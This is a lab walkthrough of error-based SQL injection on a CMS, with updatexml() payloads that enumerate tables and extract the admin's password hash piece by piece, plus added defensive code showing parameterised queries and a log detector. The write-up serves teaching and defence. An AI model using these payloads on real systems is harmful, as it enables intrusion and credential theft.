CMS lab target: error-based SQL injection

Injection using updatexml

First, query the current database name; the result is cms.

?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)

Next, list the tables in that database. Table names and column names are stored in the information_schema database, so query information_schema.tables. First count how many tables cms contains: the result is 8.

?id=33 and updatexml(1,concat(0x5e,(select count(*) from information_schema.tables where table_schema=database()),0x5e),1)

Use LIMIT paging to read table_name one row at a time: the previous count found 8 tables in cms, but the error message echoes only a single row.

limit 0,1: return one row starting at offset 0 (the first row)

limit 1,1: return one row starting at offset 1 (the second row)

?id=33 and updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5e),1)

cms_article

?id=33 and updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x5e),1)

Incrementing the offset from 1 through 7 returns the remaining tables:

cms_category
cms_file
cms_friendlink
cms_message
cms_notice
cms_page
cms_users

Now view the column names in the users table. The CMS escapes single quotes, so the quoted string 'cms_users' cannot be passed as-is; instead, supply the table name as a hexadecimal literal, which MySQL accepts as a string value without any quotes.

http://192.168.16.136/cms/show.php?id=33 and updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit 0,1),0x5e),1)

?id=33 and updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273 limit 0,1),0x5e),1)

userid
username
password
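The hex literal above works because escaping quotes only protects values that sit inside quotes; the injection point here (show.php?id=) is an unquoted numeric context, so a payload with no quote at all is never touched by the escaping. The following is an added example, not code from the page or from the CMS it describes: a constructed sqlite in-memory stand-in for the lab's tables (sqlite has no updatexml(), so it demonstrates the query-construction flaw rather than the error channel) showing the quote-escaping-then-concatenate pattern beside the bound-parameter fix. Table and column names follow the page; the article title and password value are placeholders.

```python
import sqlite3

# Constructed in-memory stand-in for the lab's tables (sqlite, not MySQL).
# The password value is a placeholder, not the lab's hash.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cms_article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO cms_article VALUES (33, 'constructed article')")
    conn.execute("CREATE TABLE cms_users (userid INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO cms_users VALUES (1, 'admin', 'PLACEHOLDER_HASH')")
    return conn

def escape_quotes(value):
    # addslashes-style escaping of single quotes, the defence the page says the
    # CMS applies; it only does anything when the value lands inside quotes.
    return value.replace("'", "\\'")

def show_article_vulnerable(conn, raw_id):
    # Escaped, then concatenated into an UNQUOTED numeric context. A value such
    # as "33 and (select ...)" contains no quote, so nothing is escaped and the
    # injected subquery runs against any table the DB account can read.
    sql = "SELECT title FROM cms_article WHERE id = " + escape_quotes(raw_id)
    return conn.execute(sql).fetchone()

def show_article_safe(conn, raw_id):
    # Bound parameter: the whole request value is compared to id as a value and
    # never parsed as SQL, so "33 and ..." simply matches no row.
    sql = "SELECT title FROM cms_article WHERE id = ?"
    return conn.execute(sql, (raw_id,)).fetchone()

def show_article_strict(conn, raw_id):
    # Validate the type at the boundary as well: a non-numeric id is rejected
    # (ValueError) before any query is built, which also makes probes visible.
    article_id = int(raw_id)
    sql = "SELECT title FROM cms_article WHERE id = ?"
    return conn.execute(sql, (article_id,)).fetchone()

if __name__ == "__main__":
    db = make_db()
    probe = "33 and (select count(*) from cms_users) = 1"
    print("vulnerable:", show_article_vulnerable(db, probe))  # row returned: subquery ran
    print("safe:      ", show_article_safe(db, probe))        # None
    print("safe (33): ", show_article_safe(db, "33"))         # row returned
```

The vulnerable variant still returns the article when the injected condition is true and nothing when it is false, which is exactly the oracle the page's walkthrough relies on; the bound-parameter variant answers only for a genuine id. Hex literals, comment markers and other quote-free tricks are irrelevant once the value is bound rather than concatenated.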

With the database, table and column names known, read the username and password.

?id=33 and updatexml(1,concat(0x5e,(select username from cms_users limit 0,1),0x5e),1)

Get username: admin

The echoed data may be length-limited, so use the substr() function to output the queried content in pieces. Note that substr() positions start at 1, whereas string indexing usually starts at 0.

First check the password length: it is 32 characters.

?id=33 and updatexml(1,concat(0x5e,(select length(password) from cms_users limit 0,1),0x5e),1)

Display the first 16 characters first, then the remaining 16.

?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users limit 0,1),0x5e),1) #substr(password,1,16) outputs password from position 1 through position 16

e10adc3949ba59ab

?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users limit 0,1),0x5e),1) #substr(password,17,32) outputs password starting at position 17; the third argument is a length, so on a 32-character value this yields positions 17 through 32

be56e057f20f883e

e10adc3949ba59abbe56e057f20f883e
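Every step of this walkthrough leaves the same fingerprint in the web server's access log: updatexml() wrapped around a subquery, information_schema references, 0x hex literals and substr() slicing, all inside the id parameter of show.php. The following is an added example, not from the page or the CMS it describes: a small detector that parses constructed access-log lines (the client IPs and timestamps are invented; the payload shapes mirror the probes above) and flags requests carrying those indicators, then counts flagged requests per source so a burst from one client stands out for triage.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format); not from the lab.
SAMPLE_LOG = """\
192.0.2.10 - - [23/Aug/2023:15:30:26 +0800] "GET /cms/show.php?id=33 HTTP/1.1" 200 5120
192.0.2.10 - - [23/Aug/2023:15:30:31 +0800] "GET /cms/show.php?id=33%20and%20updatexml(1,concat(0x5e,(select%20database()),0x5e),1) HTTP/1.1" 200 812
192.0.2.10 - - [23/Aug/2023:15:31:02 +0800] "GET /cms/show.php?id=33%20and%20updatexml(1,concat(0x5e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),0x5e),1) HTTP/1.1" 200 812
192.0.2.11 - - [23/Aug/2023:15:32:10 +0800] "GET /cms/show.php?id=34 HTTP/1.1" 200 4980
192.0.2.10 - - [23/Aug/2023:17:12:59 +0800] "GET /cms/show.php?id=33%20and%20updatexml(1,concat(0x5e,(select%20substr(password,17,32)%20from%20cms_users%20limit%200,1),0x5e),1) HTTP/1.1" 200 812
"""

# Combined log format: client, identd, user, timestamp, request line, status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+)'
)

# Indicators matched against each URL-decoded query parameter value.
INDICATORS = [
    ("error_based_xml_func", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("schema_enumeration", re.compile(r"\binformation_schema\.", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{2,}\b", re.I)),
    ("substring_extraction", re.compile(r"\b(substr|substring|mid)\s*\(", re.I)),
]

def decode_params(target):
    # parse_qsl percent-decodes values, so "%20" and "+" become spaces here.
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)

def scan_line(line):
    # Returns None for unparseable lines, otherwise a record with the hits found.
    m = LOG_RE.match(line)
    if not m:
        return None
    params = decode_params(m["target"])
    hits = set()
    for name, value in params:
        for label, pattern in INDICATORS:
            if pattern.search(value):
                hits.add((name, label))
    return {"ip": m["ip"], "ts": m["ts"], "status": m["status"],
            "params": params, "hits": sorted(hits)}

def scan_log(text):
    # Keep only requests with at least one indicator hit.
    return [r for r in (scan_line(l) for l in text.splitlines()) if r and r["hits"]]

def summarize(alerts):
    # Flagged requests per source IP: repeated probes from one client are the signal.
    counts = {}
    for a in alerts:
        counts[a["ip"]] = counts.get(a["ip"], 0) + 1
    return counts

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(a["ts"], a["ip"], a["status"], a["hits"])
    print(summarize(found))
```

Two things worth noting for production use: the 200 status on every flagged line shows why status codes alone do not catch error-based injection (the page rendered normally, with the error text inside it), and the parameter values are decoded once before matching because the payloads arrive percent-encoded; a site that also sees double-encoded traffic would need a second decoding pass.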

Origin blog.csdn.net/weixin_58954236/article/details/132524655